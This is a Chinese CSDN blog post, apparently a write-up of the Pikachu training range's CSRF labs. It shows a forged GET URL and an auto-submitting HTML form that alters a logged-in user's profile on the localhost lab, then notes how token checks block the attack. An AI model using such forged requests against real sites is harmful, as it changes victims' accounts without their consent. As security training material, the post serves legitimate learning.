CSRE之post

最新推荐文章于 2024-07-24 16:20:20 发布
最新推荐文章于 2024-07-24 16:20:20 发布
阅读量356 收藏 9
点赞数 9
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ljn176118045/article/details/135229456
版权

1、get类型

首先,看提示获取账号密码

如图,当修改信息时

出现了一个地址,这就是网址,我们只需把这个发给用户,即可完成localhost /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=%E7%94%B7&phonenum=1234567&add=jiangxi&email=123%40qq.com&submit=submit 

改为:http://localhost /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=%E7%94%B7&phonenum=1234567&add=jiangxi&email=123%40qq.com&submit=submit HTTP/1.1

此处修改为了jaingxi

2、post类型

请求的修改在信息当中,不在url,因此不能通过url修改

在这里,则需要在自己的服务器上搭建脚本

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="123456789" />
    <input id="add" type="text" name="add" value="hubei" />
    <input id="email" type="text" name="email" value="lucy@163.com" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

然后http://127.0.0.1/Pikachu/vul/csrf/csrfpost/post123.html发送,即可修改

3.token类型

具有token,此举安全性提高

然后,可以看看源码

set_token()函数如上图所示,在生成新token之前会先销毁老token,避免token重复使用

ljn176118045
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【网络安全】CSRF漏洞详细解读
你在看屏幕的同时,屏幕也在注视着你
05-22 1724
CSRF一 CSRF介绍1.什么是CSRF2.CSRF漏洞危害二 CSRF的三种漏洞1.GET类型CSRF2.POST类型CSRF3.Token类型CSRF三 靶场演示四 CSRF漏洞修复方法修复方案(1)验证http referer字段(2).在请求地址中添加token并验证(3)在http头中⾃定义属性并验证(4)其他防御⽅法五 小结 一 CSRF介绍 1.什么是CSRF CSRF(Cross-site request forgery)跨站请求伪造,也被称为"One Click Attack"或者Se
Django的cs rf token验证
qq_41048761的博客
03-12 442
CSRF(Cross Site Request Forgery protection),中文简称跨站请求伪造。django中对POST请求,csrf会进行认证处理,csrf认证机制是防御跨站伪造功能,在没有任何处理的前提下,POST请求会报错。 Django 第一次响应来自某个客户端的请求时,会在服务器端随机生成一个 token,把这个 token 放在 cookie 里。然后每次 POST 请求都会带上这个 token,这样就能避免被 CSRF 攻击。 例子如下: login.html页面: 浏
CSRF漏洞详解
xcxhzjl的博客
11-19 3157
一、CSRF漏洞原理 1、基本原理 CSRF(Cross-site Request Forgery,跨站请求伪造)是一种针对网站的恶意利用。 CSRF攻击可以利用用户已经登陆或已经授权的状态,伪造合法用户发出请求给受信任的网点,从而实现在未授权的情况下执行一些特权操作。 CSRF与XSS听起来很像,但攻击方式完全不同。XSS攻击是利用受信任的站点攻击客户端用户,而CSRF是伪装成受信任的用户攻击受信任的站点。 2、流程图 3、条件 ●用户成功登陆了网站系统,能执行授权的功能 ●目标用户访
CSRF漏洞原理说明与利用方法
liu0yun的博客
06-20 1543
一 、什么是CSRF Cross-SiteRequestForgery(CSRF),中文一般译作跨站请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。 通常情况下,有三种方法被广泛用来防御CSRF攻击:验证token,验证HTTP请求的Referer,还有验证XMLHttpRequests里的自定义header。鉴于种种原因,这三种方法都不是那么完美,各有利弊。 二、CSRF...
刚学习到CSRF——简要说下CSRF
weixin_30835933的博客
11-07 46
1.,CSRE全称是(Cross-site request forgery),中文名称:跨站请求伪造它可以看成是一种技术与艺术的结合既是社会工程学与软件技术的结合(社会工程学-欺骗的艺术一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段。黑客行为成功的要素:高超的程序技巧不同寻常的耐心精通社会工程学)2.CSRF关于使用社会工程学原理原理是揣测并利用用户心...
day5保持状态(cookie,session,csrf)
weixin_60677608的博客
04-26 83
目录: 1.Session的用法 2.Session与Cookie的区别 3.CSRE攻击的解决方法 cookie逻辑图: 客户端—>(第一次登录)服务器–>生成cookie信息–>返回cookie信息(响应)–>客户端(保存cookie信息)–>发送cookie请求–>服务器–>对cookie进行辨别–>返回响应–>客户端 5.1Cookie介绍 5.1.1HTTP短连接的解惑 短链接:没有记录功能,每次访问都需要重新拉联系 长链接:不会立马断开
web开发常见安全问题(SQL注入、XSS攻击、CSRF攻击)
ItBJLan的博客
05-23 930
SQL注入        SQL攻击(SQL injection),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。原因        在应用程序中若有下列状况,则可能应用程序正暴露在SQL Injection的高风险情况下...
【DVWA】Brute Force
qq_43665434的博客
03-03 243
【DVWA】Brute Force 一、low级别 1、测试流程 方法一:burp 用brup抓包,发送到Intruder模块 添加变量: 设置payload与字典: payload1 payload2 开始攻击: 成功爆破出用户名admin,和密码password **方法二:**万能密码 用万能密码也可以: 利用sql注入漏洞,使用常见密码admin,构造payload:admin' #(#用于注释后面对于password的判断,使sql语句只查询admin然后返回
rbac 权限分配, 基于formset实现,批量增加
weixin_30521161的博客
04-16 116
这里需要两个知识点:  - formset  - 自动发现项目中的URL1. 什么是formset:  Django中 form组件 或 ModelForm组件,用于做一个表单的验证。 接收前端form表单中的数据,并进行验证。 并且还可以用于表单的渲染工作。 (就是直接循环form对象,每一个字段都会被渲染成一个标签。并放在form标签中。)   注: 我提到了,是 “一个” 表单的...
xlsx.core.min.js
11-12
读取excel类型文件,完成读写功能!!!
leetcode中国-CS_Re-examination:关于复试的一些经验与资料(持续更新中,也欢迎各位大佬更正补充)
06-29
leetcode中国 1. 机试如何准备 如何找机试题 王道论坛上找 王道上有很多资料,每个大学都有一个专区,对于计算机专业来说真的是一个宝藏网站,好多的大佬都会把自己的资源公开出来,包括初试复试机试题,考研经验贴...
JAVA培训新手教程
08-07
【JAVA培训新手教程】 在Java编程领域,新手入门往往需要一套系统且易懂的教程来引导。"JAVA培训新手教程"就是为此目的设计的一份学习资源,它来源于专业的培训机构,旨在帮助初学者快速掌握Java语言的基础知识。...
全国计算机速录等级考试(ppt文档).ppt
11-24
该考试主要针对速记的就业前景、不同输入法的优缺点、指法训练、CSRE速录基础知识及实践操作等方面进行考核。CSRE,即Computer Standardized Rapid English,是一种高效的汉字输入法,特别适合需要快速记录的场合,...
中子缺陷的Y,Zr和Nb同位素的质量测量及其对和核合成过程的影响
03-21
在兰州的实验存储环CSRe上使用等时质谱,首次测量了$ ^ {82} $ Zr和$ ^ {84} $ Nb的质量,不确定度约为10 keV,质量为 ^ {79} $ Y,$ ^ {81} $ Zr和$ ^ {83} $ Nb以更高的精度重新确定。 后者的约束力远小于其文献...
Android Kotlin:协程
qq_40853919的博客
07-23 678
1)协程是什么?2)协程和线程的关系?3)协程如何使用?切线程是什么4)挂起函数是什么?5)withContext和lanuch的区别在哪里?6)Defualt、IO和Main的区别。
MySQL的MHA
最新发布
2402_84844434的博客
07-24 784
高可用模式下的故障切换,基于主从复制。单点故障和主从复制不能切换的问题。至少需要3台。奇数台故障切换的过程0~30秒。根据vip地址所在的主机,确定主备。主和备不是靠优先级决定的,主从复制的时候就确定了主,备是在MHA的过程中确定的。
uniapp安卓通过绝对路径获取文件
qq_61950936的博客
07-23 389
请确保你的uniapp应用具有读取存储的权限,并且该文件确实存在于指定的路径。此外,你的应用可能需要运行在Android 4.4及以上版本的设备上,因为plus.io API是基于HTML5 Plus的,而这个特性需要设备的Android版本和浏览器支持。在uniapp中,如果你想要访问安卓设备上的文件,你需要使用uniapp提供的plus.io API。这个API允许你在应用内访问设备的文件系统。
Android SurfaceFlinger——GraphicBuffer内存申请(三十)
小旭的专栏
07-24 1175
Android的图形子系统中,GraphicBufferAllocator 和 GraphicBufferMapper 是处理图形缓冲区的核心组件。这两个类分别负责缓冲区的分配和映射,是 GraphicBuffer 类的基础,GraphicBuffer 用于封装和管理图形数据。
【安卓】Android Studio简易计算器(实现加减乘除,整数小数运算,正数负数运算)
qq_73830179的博客
07-24 1423
随着移动互联网的普及,手机应用程序已经成为人们生活中不可或缺的一部分。计算器是一类被广泛使用的应用程序之一,因此学习如何开发一款简易的计算器应用程序是学习Android Studio开发的一个很好的开始。Android Studio是一款Google开发的用于创建安卓应用的集成开发环境(IDE), 它可以帮助开发者快速设计、开发和测试应用程序。接下来我将为大家介绍如何使用Android Studio创建一个简易的计算器应用程序。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值